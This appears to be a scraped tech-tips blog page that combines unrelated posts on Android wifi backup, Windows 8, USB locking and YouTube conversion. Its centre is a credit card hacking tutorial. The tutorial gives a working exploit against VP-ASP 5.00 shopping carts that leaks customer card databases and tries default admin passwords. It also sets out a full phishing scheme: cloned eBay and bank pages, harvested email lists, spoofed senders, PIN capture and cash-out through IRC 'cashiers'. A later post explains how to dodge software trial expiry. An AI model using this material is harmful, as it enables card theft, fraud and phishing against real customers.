How To Make A Backup Of Wireless Configurations In Android

For the geeks Android frequently changing ROM the act of having to reconfigure the wireless networks can be a real big hassle, because when you install a new ROM you must make several “ wipe ”thus losing all data stored in the device, including all passwords and network configurations saved. There are many applications that allow the backup of these configurations, but most of them are paying for this today and we’ll show you how,  without using any application,  we can  make a backup of wireless configurations.

Backup configurations of wireless

This guide works with most of Android devices, and requires root permissions .
Backup on Android 2.3 (Gingerbread):
  • Get a file manager with access to root privileges (recommended Solid Explorer which is free)
  • Open the file manager and position of / data / wifi / and copy the file bcm_supp.conf  save it somewhere.
Backup on Android 4.0 (Ice Cream Sandwich):
  • Get a  file manager  with access to  root privileges  (recommended  Solid Explorer  which is free)
  • Open the file manager and position of  / data / misc / wifi /  and copy the file wpa_supplicant.conf  save it somewhere.

Resetting wireless settings

  • Return the file . conf  previously saved in its original folder (in  / data / wifi / or if you have Gingerbread / data / misc / wifi / if you have ICS) overwriting the file (if present).
  • Change the file permissions to the file manager and impostateteli like this:
    • Owner:  Read – Write
    • Group:  Read – Write
    • Other:  all unchecked
  • Reboot the phone to make the changes effective.
Really very simple, isn’t it?

How to Hack a Credit Card


How to Hack a Credit Card

Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).


This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking 

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.


That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.

Lock Your Computer With USB Flash Drive


Lock Your Computer With USB Flash Drive

Security of laptops and notebooks have been evolving with new technologies like fingerprint readers, eye scanners, face recognition etc but what about the personal computers?

Using this trick you will be able to lock your computer with a Usb. The computer will work only when the Usb is plugged in. Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark. Moreover your computer will get automatically locked. To unlock the computer you will need to insert the Usb again.

This trick will work on on all versions of windows including both windows 32 bit and 64 bit

Here is the Trick to lock Your Computer With Usb Using Predator

1. Download predator software by clicking here 

2. Predator will get launched automatically after completing installation if not you can run it fromStart/Programs/Predator

3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)



4. Click on Ok and Enter your your new password in next dialog box

5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list

6. Finally click on Create Key button and then on OK button



After this the software will automatically exit.Now restart the program by clicking the icon on desktop.

Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself.

Top 6 Windows 8 Tips


Top 6 Windows 8 Tips

Windows 8 isn’t even out in beta yet, but it has built up quite a bit of buzz. Tech bloggers and analysts have been talking about it for months and months, but beyond the folks at Microsoft and some developers and reviewers, there have been very few who have had the opportunity to go hands on with this operating system.

Even though a lot of folks haven’t been able to try this new operating system, and it isn’t due out for quite some time, there are a lot of hints, tricks and tips already out for Windows 8. If you can get your hands on a copy of Windows 8 when it comes out on Beta, the following top 6 Windows 8 tips should help you get started using this brand new OS like a pro.

1. You don’t have to use the Ribbon Interface in the explorer windows. There are many users who may find this feature useful, making it easier to find and open files. Other users may not be so keen on this feature, finding it distracting and bulky. You can change this in the Computer Configuration. From here, select “Administrative Templates,” “Windows Components,” and finally “Windows Explorer.” You will need to select enabled for the “Start Windows Explorer with the Ribbon Minimized” option to hid the ribbons on your next startup.

2. There are plenty of new Keyboard shortcuts. While some of the old keyboard shortcuts will still work, there are some new ones that you get to use with Windows 8. The Windows Key and “W” brings up the settings search. Windows and “C” call up the simple “Start menu” along with the date and time. If you select Windows and “Q” the application search comes up. These are only a small sampling of the new shortcuts that are already known for this new operating system.

3. You can uninstall programs from the Start Menu. This is a handy new feature that will make it much easier to get unwanted programs off of your system. To uninstall a program from your Start Menu in Windows 8, right click on the icon for the program to get rid of select uninstall and click on it a second time. Windows 8 is made for touch screen systems, as they seem to be the next big thing; with touch screen you uninstall programs from the start menu by holding the program icon to get options, selecting uninstall from there.

4. Bring back the old control panel interface. If you think the new control panel that Windows 8 offers is a bit too new-fangled, you can get the old one back. Simply open the control panel and select “More Settings” at the bottom of the screen. You will see an option for selecting the old control panel interface.

5. Login Automatically. To set this feature, open the Run dialogue box and enter “netplwiz” to launch the User Accounts dialog box in Windows 8. Uncheck the option that requires users to enter a user name and password. Then you will need to enter the username and password of the account you want to be logged in automatically and select OK. Restart your system and automatic login is all set.

6. You can use a picture for a password. In the Control Panel, if you select “Users” you can create a picture password. Instead of the traditional alphanumeric keyword, Windows 8 lets you use a picture. You select the image and then do a serious of clicks and gestures over the image. To login with the picture passwords, you have to produce the same combinations of gestures on the images when you login, so don’t make your picture password too complicated.

Registry Cleaner Reviews - Why is it necessary to clean up the registry?

How To Convert YouTube Videos Into Mp3 Audio


How To Convert YouTube Videos Into Mp3 Audio

Posted by  in ArticlesInternet
There may be instances in your life, while you search for a song in the internet (mp3) and fail to get it and at last found its video in YouTube or any similar sites.. so what will you do if you need only the mp3(audio) instead of video. Most of them download the song(video) using some YouTube downloaders and use some applications to convert it into mp3. These all need some time and consume your internet usage a lot. And it’s a tedious job. You may fail to get the output iff there is any error in your internet connection. But today I am with a simple trick with which you can convert your YouTube videos into mp3 online,without any software. Only you need is the url of theYouTube video. That’s all. Scroll down and enjoy the trick…..
In this field insert the url of the video
You can also select the quality
Click on ‘convert’
Then you will be taken to this page. When popup appear allow java applet

Trick to crack any software and run the trial version forever


Trick to crack any software and run the trial version forever


Are you using any trial version software which is just too awesome but nearing its expiry and unable to find ways to crack it?
trial Crack any software and run the trial version forever?
Here is a trick to crack any software and run the trial version forever just in a couple of minutes.

Before starting with the crack you should know how these trial version software are programmed. These software’s always comes with 1 month trial period after which they will expire. When these software’s are installed for the first time they make an entry of Installation Date, Time etc. in the Windows Registry. Whenever we run these software’s they compare the current system date and time with the installation date and time. Thus they make out whether the trial period is expired or not.
Manually changing the system date and time to an earlier date and time will not be the right solution. To over come this there is a simple tool “RunAsDate v1.11” which can be used.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.
Tips to Follow:
-  Download this utility and have it ready all time
-  As soon as you install any trial version software just note down the date and time of installation
-  Inject the expiry date and time in the RunAsDate tool. It is always safe you put in a date which is prior to your expiry date
runasdate Crack any software and run the trial version forever?
-  After expiry always run the such software’s using the RunAsDate tool. Thus the trial version software will run forever!!!
Note: After expiry don’t run such software’s directly else the crack will no longer work.
Download: RunAsDate
I hope this trick would be of great help for most of us… Try it out and put in your comments!!!

 
PC WORLD © 2012 | Designed by Cheap TVS, in collaboration with Vegan Breakfast, Royalty Free Images and Live Cricket Score